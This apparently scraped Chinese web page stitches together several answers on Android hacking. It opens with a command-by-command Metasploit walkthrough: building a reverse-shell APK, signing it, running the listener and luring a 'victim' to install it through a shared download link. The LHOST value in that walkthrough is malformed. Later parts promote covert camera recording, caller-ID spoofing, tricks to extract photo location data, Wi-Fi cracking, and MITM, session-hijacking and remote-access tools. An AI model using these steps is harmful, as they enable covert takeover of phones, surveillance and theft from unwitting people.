本文目录一览:
如何使用metasploit对安卓手机进行控制
在这次的实验中,我会使用kali linux和安卓模拟器演示如何使用Metasploit框架控制Android设备。
创建负载
我们需要两台虚拟机:Kali Linux和安卓模拟器。
打开vm启动Kali linux。接着打开终端,使用msfvenom制作android利用程序。
Msfvenom是msfpayload和msfencode的组合。它是一个单一的工具。它有标准的命令行选项。 Msfvenom用来制造的有效载荷用来渗透Android模拟器。
一旦打开终端提示符下输入以下命令,使用msfvenom工具来创建有效载荷APK文件。
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1128 LPORT=4444 R /root/Desktop/pentest.apk
p 设置要使用的payload
LHOST 设置用来接收反弹连接的主机
LPORT 设置用来接收反弹连接的端口
R 设置文件格式
Location 要保存的文件位置
这个命令执行完之后,你会看到一些错误,但不用担心。现在可以到输出目录查看生成的apk了。
我们已经成功创建了Android格式(APK)文件的有效载荷。现在一般Android的移动设备不允许安装没有适当签名证书的应用程序。 Android设备只安装带有签署文件的APK。
我们可以使用如下工具进行手动签名:
l Keytool (已安装)
l jar signer (已安装)
l zipalign (需要安装)
执行下列命令签名。首先使用密钥工具创建密钥库。
keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
然后使用JARsigner签名APK
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore APPNAME.apk aliasname`
再用JARsigner验证签名
jarsigner -verify -verbose -certs APPNAME.apk
Kali没有预装Zipalign,需要先apt-get install zipalign。然后用zipalign来验证apk。
zipalign -v 4 APPNAME.apk NEWAPPNAME.apk
现在我们有了一个带有签名的APK,它可以安装在任何设备上。
使用Metasploit进行测试
接下来启动metasploit的监听器。执行msfconsole打开控制台。
use exploit/multi/handler
Set PAYLOAD android/meterpreter/reverse_tcp
SET LHOST 192.168.152.128
SET LPORT 4444
Exploit
是时候将恶意的APK发送到手机上。我们这里使用一个网盘上传我们的APK,并将下载链接分享出去。
1、从下载android x86的iso。
2、使用vmware创建一个内核版本为2.6的虚拟机。
3、挂载镜像,启动虚拟机。
4、进入Live模式。
5、设置手机并登陆谷歌帐号。
在安卓模拟器里面点击那个链接并下载。我们已经发送了一封邮件到受害者的谷歌帐号上。
另外要允许安卓安装来历不明的apk。
切换回Kali,我们发现创建了一个新的会话。
然后你就可以为所欲为的操作这台“手机”了。
处女星号手机APP可以玩?
介绍一些好玩的手机应用
xposed框架
在
酷安
下载各种模块,比如
徽信外挂:红包,群发,自动回复
修改gps定位信息
破解防截图安全机制
更改手机IEMI, ID, 序列号以及蓝牙MAC地址
等等
多开助手
可以多开徽信和QQ等,方便使用小号保护自己的隐私
voip网络电话: calla droid
也可以使用
阿里通/有信
等等拨打时不显示自己的真实号码保护隐私当然,市面上有些第三方SIP提供商进行灰色配置可以做到
去电显示修改
Mobile hidden camera隐秘摄像机
屏幕图标是一个记事本在输入密码之前功能正常口令触发之后可调出设置界面该应用可在打电话/看视频等正常操作过程中
后台静默摄像录音
可用来对关键情景进行
取证
伪装来电
应用场景是在想要
脱身
的时候,作为借口比如相亲,或者乏味的谈话/活动讲座在晚上打车等
潜在危险时
也能警醒暗示司机有人联系和准备接待比较厉害的是:
通话记录和短信
,在手机里都是真实存在的
微PN,更大的世界
为什么会有人
无私高尚
的免费分享微屁恩账号给你用?是因为客户端app可以赚取广告费吗不是,因为使用通道的流量可能被分析那么从事灰色/黑色产业的人共给小白就能混
淆从事非Fa行为
的一些踪迹
付费购买只建议`express vp恩` 如果你自己愿意折腾 购买一个`海外vps服务器` 搭梯子最好不过
当你上网时,最好开启它保护好自己的隐私因为
ip地址通常可以高精度定位
有时候转发一篇网络文章或者发个红包就能知道你在哪里了
加密通讯telegram
当你在使用聊天软件打出某些关键词然后出现了特效,比如爱心,蛋糕等等或者发过去,对方看不见被屏蔽了这说明了什么呢?呵呵telegram使用的是
端对端加密
不会被服务器劫持保存数据所以能更好的保护我们的隐私当然,你最好在google play商店下载很多国内应用平台的汉化版可能被篡改而导致带有后台木马
go谷歌安装器
通常国产手机都是被阉割的所以很多应用你没法下载使用比如不存在的
油管,脸盆网,蓝色小鸟
在很多平台的应用不一定是官方该应用支持免ROOT一键安装
google服务框架
和应用商店等
第二身份:手机号
推荐
阿里小号
和
google voice
前者其实也是实名制,安全是相对的如果不愿折腾,后者建议在某宝买大量的遭遇数据泄漏:外卖/网购订单信息为了防止隐私裸奔通常是骚扰电话或者诈骗钓鱼也避免可能遭到的
恶意的伤害或报复
在日常要专门准备一个小号用于隔离
. 渗透测试软件:zanti
由以色列移动安全公司Zimperium开发的此外,它能够支持一系列的网络任务:MAC变更、zther欺骗的手机端实现了记录请求、记录图像、zpacketEditorSSL strip、重新导向HTTP、替代图片获取下载、截获下载、插入HTMLrouterpwn.com、云报告、WIF监控器HTTP服务器等一系列强大功能
取证:录音宝 与 录音存证宝
当你遇到危险或者人身威胁时记得将
通话录音
,以及现场环境录音可以申请相关
司法鉴定
机构出具鉴定文书
protonmail加密邮箱
注册时
无需手机认证码
,保护隐私使用了无缝对接的P
GP点对点加密
技术默认
不记录ip
开源,代码可审查
exif viewer
很多人在发微信/QQ//微博/时,可能会上传
原图
那么通过软件分析就能瞬间知道
在哪里拍的
什么时间,精确到几分几秒
gps精确定位
手机品牌和具体型号
照片分辨率,摄像头像素等
简答点,直接批量
下载朋友圈
即可难一点使用
社会工程学:
其实图灰色方块本来片是显示ok的,可以用
ps等将屏幕截图修改
告诉对方查看异常要求发送原图试试,就可以
获取Exif数据
了
wifi密码破解和查看
其实
wifi万能钥
匙这样的app很多不过一旦使用,自己的wifi也可能被共享噢偶尔在特殊情况应应急还是可以的连上wifi后,如何查看明文密码呢?
安卓手机需要root
使用密码查看器
如何配置远程连接的drozer
drozer是一款全功能的安卓安全审计工具,不仅可以在本地审计APP的安全漏洞,还可以做到远程连接,从远程控制手机,下面就交大家如何配置远程链接的drozer.
先在远程服务器开启drozer server,drozer server默认是绑定的0.0.0.0,对外开放31415端口
在手机中的drozer agent点击设置
配置Endipoint设置远程drozer server的IP地址
最后在本地的客户端连接远程的drozer server,就可以使用远程手机客户端drozer的所有功能。
drozer console connect –server IP地址
另外drozer还支持无界面的纯服务agent,完全是个全功能的手机渗透测试程序,其他用法就大家自己去琢磨了 enjoy it )。
android中间人攻击测试工具lanmitm怎么用
笔者实习快四个月了,刚来公司的时候没什么任务,空闲的时候发现了安卓渗透神器dsploit,安装玩了几次。其实以前也听说过中间人攻击,也玩过ettercap,MITMf,metasploit等,但是一直没想过在Android上面实现这些功能,于是乎下载dsploit源码玩了几天。
刚好自己也是做Android相关工作的,所以有了自己写一个的想法,依葫芦画瓢开发了这个工具。
免责声明
本应用开发初衷仅为了学习,未经他人允许,对他人局域网进行的破坏,干扰等行为与本人无关。
功能概述
数据嗅探,可抓去局域网内部主机与外界通信数据
会话劫持,对局域网中的主机通过实施ARP欺骗,进行cookie欺骗,从而达到劫持会话的效果
简单web服务器功能,结合下面功能实施钓鱼欺骗
URL重定向,实现DNS欺骗功能。配合上面web服务器功能,可进行钓鱼欺骗功能待(待完成)
WiFi终结,中断局域网内主机与外界通信(待完成)
代码注入,通过数据截取,对远程主机返回的数据进行篡改,实现代码注入的效果(待完成)
截图预览
安装前提
1、安卓手机2.3及以上,必须root
2、已安装busybox
下载地址
虽然该应用目前功能单一,但是毕竟是自己慢慢写出来的,我还是会继续更新下去的。如果有想法,或者想学习的同学都欢迎和我交流
直接贡献代码
安卓渗透是什么意思,网上看到好多安卓渗透软件,干什么用的?
先把这个词分为两部分来解读:1.Android是一种基于Linux的自由及开放源代码的操作系统,主要使用于移动设备,如智能手机和平板电脑,由Google公司和开放手机联盟领导及开发。尚未有统一中文名称,中国大陆地区较多人使用“安卓”或“安致”。Android操作系统最初由Andy Rubin开发,主要支持手机。2005年8月由Google收购注资。2007年11月,Google与84家硬件制造商、软件开发商及电信营运商组建开放手机联盟共同研发改良Android系统。随后Google以Apache开源许可证的授权方式,发布了Android的源代码。第一部Android智能手机发布于2008年10月。Android逐渐扩展到平板电脑及其他领域上,如电视、数码相机、游戏机等。2011年第一季度,Android在全球的市场份额首次超过塞班系统,跃居全球第一。 2013年的第四季度,Android平台手机的全球市场份额已经达到78.1%。[1] 2013年09月24日谷歌开发的操作系统Android在迎来了5岁生日,全世界采用这款系统的设备数量已经达到10亿台。2.渗透,这里的渗透指的是渗透测试,而渗透测试是为了证明网络防御按照预期计划正常运行而提供的一种机制。不妨假设,你的公司定期更新安全策略和程序,时时给系统打补丁,并采用了漏洞扫描器等工具,以确保所有补丁都已打上。如果你早已做到了这些,为什么还要请外方进行审查或渗透测试呢?因为,渗透测试能够独立地检查你的网络策略,换句话说,就是给你的系统安了一双眼睛。而且,进行这类测试的,都是寻找网络系统安全漏洞的专业人士。
结合起来来说就是“
安卓平台的相关漏洞挖掘和测试,
端口扫描
漏洞发现
对路由器扫描
伪造数据包
会话控制(需要MSF RPC 连接)
中间人攻击
密码破解
有能力可以攻占路由器
常用软件:dsploit,Network Spoofer,zANTI,DroidSheep
上图为zanti软件运行截图。
相关书籍:
Android恶意代码分析与渗透测试
Android系统安全...等
2016 黑客的 Android 工具箱都有哪些
AndroRAT
AndroRAT一词源自Android与RAT(即远程管理工具)。这款顶级黑客工具已经拥有相当长的发展历史,而且最初其实是一款客户端/服务器应用。这款应用旨在帮助用户以远程方式控制Android系统,同时从其中提取信息。这款Android应用会在系统启动完成后以服务形式开始运行。因此,如果用户并不需要与该服务进行交互。此应用还允许大家通过呼叫或者短信等方式触发服务器连接。
这款极具实用性的Android黑客应用之功能包括收集联系人、通话记录、消息以及所在位置等信息。此应用还允许大家以远程方式对接收到的消息以及手机运行状态加以监控,进行手机呼叫与短信发送,通过摄像头拍摄照片以及在默认浏览器当中打开URL等等。
Hackode
Hackode是一款Android应用,其基本上属于一整套工具组合,主要面向高阶黑客、IT专家以及渗透测试人员。在这款应用当中,我们可以找到三款模块——Reconnaissance、Scanning以及Security Feed。
通过这款应用,大家可以实现谷歌攻击、SQL注入、MySQL Server、Whois、Scanning、DNS查找、IP、MX记录、DNS Dif、Security RSS Feed以及漏洞利用等功能。这是一款出色的Android黑客应用,非常适合入门者作为起步工具且无需提供任何个人隐私信息。
zANTI
zANTI是一款来自Zimperium的知名Android黑客套件。此软件套件当中包含多种工具,且广泛适用于各类渗透测试场景。这套移动渗透测试工具包允许安全研究人员轻松对网络环境加以扫描。此工具包还允许IT管理员模拟出一套先进黑客环境,并以此为基础检测多项恶意技术方案。
大家可以将zANTI视为一款能够将Backtrack强大力量引入自己Android设备的应用。只要登录至zANTI,它就会映射整套网络并嗅探其中的cookie以掌握此前曾经访问过的各个网站——这要归功于设备当中的ARP缓存。
应用当中的多种模块包括网络映射、端口发现、嗅探、数据包篡改、DoS以及MITM等等。